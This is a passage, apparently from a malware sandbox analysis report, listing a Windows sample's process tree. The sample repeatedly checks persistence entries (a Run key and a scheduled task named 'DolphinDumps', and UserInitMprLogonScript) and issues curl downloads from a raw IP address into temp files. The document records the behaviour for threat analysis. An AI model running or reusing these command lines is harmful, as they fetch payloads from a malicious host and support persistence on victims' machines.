    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:3008
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:2144
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1064
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:940
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:728
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:888
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\umksn" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4012
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\umksn" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1236
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\rwvhr" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:4992
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\rwvhr" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:1112
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\kuqpa" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:1048
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\kuqpa" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4552
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:3676
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:3708
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:1480
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:5112
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:4204
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:3632
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\htrwy" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:776
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\htrwy" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:400
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ssvqu" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:4700
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ssvqu" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:3424
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\uazxq" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3856
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\uazxq" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3896
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:1796
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:4476
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3764
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:3272
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:3744
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:2196
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\kwkiz" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:192
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\kwkiz" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:2856
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ffhvk" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:3348
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ffhvk" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:1460
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\mvyhx" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4960
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\mvyhx" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1784
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:4580
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:4372
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:3224
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:4716
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:1168
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:1760
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\pchwm" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3444
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\pchwm" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1340
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\lvhic" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:4772
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\lvhic" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:3340
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\dvpna" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4804
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\dvpna" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4992
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4020
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:1764
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:1824
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:1644
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:1344
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:1544
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\unids" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4336
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\unids" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4248
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ugqsr" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:4608
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ugqsr" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:3192
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\egqxw" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3596
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\egqxw" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4936
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:4940
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:3040
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:1056
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:2340
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2424
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:4652
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\lsfcj" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:1372
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\lsfcj" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:116
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\dqzsz" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:984
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\dqzsz" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:3376
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\thtuq" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:1368
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\thtuq" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4812
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:3740
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4424
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:3872
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:1104
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:2920
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:3348
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\uffyn" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3564
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\uffyn" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4732
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\nquej" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:1488
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\nquej" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:1532
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\sluvd" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:2784
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\sluvd" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4716
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:4360
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:2368
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:4656
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:3828
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:3500
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:3724
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\gzegv" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:1340
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\gzegv" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:2532
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ihjpt" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:3228
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ihjpt" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:1708
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\amlfc" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:1696
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\amlfc" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4460
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:4680
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:3292
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:4560
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2224
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:3020
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:3084
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\qdnby" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3132
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\qdnby" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3836
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\iegrr" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1420
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\iegrr" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:2156
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\maahq" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:5112
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\maahq" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4904
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:4940
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:776
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1056
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:3524
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:4556
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:3236
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ghafq" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3700
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ghafq" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:2044
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\desod" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:3928
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\desod" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:4984
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\vjvgh" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:2452
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\vjvgh" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1864
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:4928
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:3768
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2876
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:2096
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5104
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:580
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\qrnsb" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4364
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\qrnsb" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:2360
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\pfxhj" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1928
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\pfxhj" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:4796
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ralhz" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4288
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ralhz" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1064
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:2832
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:3444
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:3152
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1668
    - - C:\Windows\SysWOW64\cmd.exe
        
